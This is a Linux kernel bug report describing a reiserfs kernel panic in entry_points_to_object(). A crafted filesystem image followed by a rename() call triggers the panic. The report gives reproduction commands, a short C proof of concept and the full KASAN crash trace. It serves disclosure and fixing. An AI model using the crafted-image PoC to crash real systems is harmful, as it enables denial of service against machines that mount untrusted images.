200343 – kernel panic in entry_points_to_object() when rename() file on a reiserfs filesystem

Bug 200343 - kernel panic in entry_points_to_object() when rename() file on a reiserfs filesystem

Summary: kernel panic in entry_points_to_object() when rename() file on a reiserfs fil...

Status:	NEW

Alias:	None

Product:	File System
Classification:	Unclassified
Component:	ReiserFS (show other bugs)
Hardware:	All Linux

Importance:	P1 normal
Assignee:	ReiseFS developers team

URL:
Keywords:

Depends on:
Blocks:

Reported:	2018-06-28 20:31 UTC by Wen Xu
Modified:	2018-06-28 20:31 UTC (History)
CC List:	1 user (show)

See Also:
Kernel Version:	4.18
Subsystem:
Regression:	No
Bisected commit-id:

Attachments
The (compressed) crafted image which causes crash (66.11 KB, application/zip) 2018-06-28 20:31 UTC, Wen Xu	Details
Add an attachment (proposed patch, testcase, etc.)

Description Wen Xu 2018-06-28 20:31:53 UTC

Created attachment 276997 [details]
The (compressed) crafted image which causes crash

- Reproduce
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 154.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *foo_bar_baz;
  char *foo_baz;
  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);
  err = asprintf(&foo_baz, "%s/foo/baz", mpoint);

  rename(foo_bar_baz, foo_baz);
   
}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  341.337045] REISERFS (device loop0): found reiserfs format "3.6" with standard journal
[  341.337109] REISERFS (device loop0): using ordered data mode
[  341.337115] reiserfs: using flush barriers
[  341.338556] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30
[  341.340934] REISERFS (device loop0): checking transaction log (loop0)
[  342.285551] REISERFS (device loop0): Using r5 hash to sort names
[  358.439533] REISERFS panic (device loop0): vs-7042 entry_points_to_object: entry must be visible
[  358.439609] ------------[ cut here ]------------
[  358.439613] kernel BUG at fs/reiserfs/prints.c:369!
[  358.441701] invalid opcode: 0000 [#1] SMP KASAN PTI
[  358.442735] CPU: 0 PID: 1426 Comm: a.out Not tainted 4.18.0-rc1+ #8
[  358.444005] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  358.445950] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  358.446907] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 
[  358.450650] RSP: 0018:ffff8801deddf448 EFLAGS: 00010286
[  358.452016] RAX: 0000000000000054 RBX: ffffffffa693a200 RCX: 0000000000000000
[  358.453438] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bdbbe7f
[  358.470539] RBP: ffff8801deddf4f8 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  358.471979] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801e8ba3b80
[  358.473398] R13: ffffffffa693a940 R14: 0000000000000003 R15: ffff8801d0b86500
[  358.474835] FS:  00007f12bd2fa700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  358.476433] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  358.477578] CR2: 00000000020f0008 CR3: 00000001e7704000 CR4: 00000000000006f0
[  358.479010] Call Trace:
[  358.479529]  ? reiserfs_debug+0x10/0x10
[  358.480313]  entry_points_to_object+0xfd/0x120
[  358.481209]  reiserfs_rename+0x924/0xfc0
[  358.482004]  ? search_by_key+0x13b5/0x19d0
[  358.482842]  ? reiserfs_create+0x3d0/0x3d0
[  358.483703]  ? __asan_loadN+0xf/0x20
[  358.484441]  ? pathrelse+0x70/0x70
[  358.485161]  ? unwind_get_return_address+0x36/0x50
[  358.486136]  ? __save_stack_trace+0x92/0x100
[  358.487017]  ? __asan_loadN+0xf/0x20
[  358.487746]  ? search_by_entry_key+0x20c/0x4b0
[  358.488643]  ? __asan_loadN+0xf/0x20
[  358.489378]  ? kasan_check_write+0x14/0x20
[  358.490237]  ? blk_mq_debugfs_unregister_sched_hctx+0x50/0x50
[  358.491429]  ? _cond_resched+0x1a/0x50
[  358.492206]  vfs_rename+0xa70/0xda0
[  358.492921]  ? vfs_rename+0xa70/0xda0
[  358.493667]  ? path_mountpoint+0x940/0x940
[  358.494498]  ? kasan_check_write+0x14/0x20
[  358.495354]  ? security_path_rename+0xcb/0x130
[  358.496257]  do_renameat2+0x7d2/0x860
[  358.497004]  ? user_path_create+0x40/0x40
[  358.497836]  ? __vma_link_rb+0x12a/0x160
[  358.498640]  ? userfaultfd_unmap_complete+0x9c/0x1d0
[  358.499655]  ? handle_mm_fault+0x24b/0x380
[  358.500496]  ? mm_fault_error+0x1f0/0x1f0
[  358.501314]  ? vm_brk+0x20/0x20
[  358.501959]  __x64_sys_rename+0x3b/0x50
[  358.502764]  do_syscall_64+0x78/0x170
[  358.503523]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  358.504556] RIP: 0033:0x7f12bcd80367
[  358.505283] Code: 75 12 48 89 df e8 a9 d7 08 00 85 c0 0f 95 c0 0f b6 c0 f7 d8 5b c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b8 52 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 01 8b 35 00 f7 d8 64 89 01 48 
[  358.509030] RSP: 002b:00007ffed9c1c9f8 EFLAGS: 00000202 ORIG_RAX: 0000000000000052
[  358.510521] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f12bcd80367
[  358.511950] RDX: 00000000020f00a0 RSI: 00000000020f00a0 RDI: 00000000020f0080
[  358.513359] RBP: 00007ffed9c1ca30 R08: 00000000020f0010 R09: 0000000000000000
[  358.514779] R10: 0000000000000640 R11: 0000000000000202 R12: 0000000000400530
[  358.516190] R13: 00007ffed9c1cb30 R14: 0000000000000000 R15: 0000000000000000
[  358.517602] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  358.527284] ---[ end trace 2e85051acb5f6dc1 ]---
[  358.528655] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  358.529693] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 
[  358.533670] RSP: 0018:ffff8801deddf448 EFLAGS: 00010286
[  358.534837] RAX: 0000000000000054 RBX: ffffffffa693a200 RCX: 0000000000000000
[  358.536320] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bdbbe7f
[  358.537750] RBP: ffff8801deddf4f8 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  358.539185] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801e8ba3b80
[  358.540646] R13: ffffffffa693a940 R14: 0000000000000003 R15: ffff8801d0b86500
[  358.542084] FS:  00007f12bd2fa700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  358.543738] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  358.544901] CR2: 00000000020f0008 CR3: 00000001e7704000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/latest/source/fs/reiserfs/namei.c#L1278
	if (inode) {
		if (!de_visible(de->de_deh + de->de_entry_num))
			reiserfs_panic(inode->i_sb, "vs-7042",
				       "entry must be visible");
		return (de->de_objectid == inode->i_ino) ? 1 : 0;
	}

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.

Note You need to log in before you can comment on or make changes to this bug.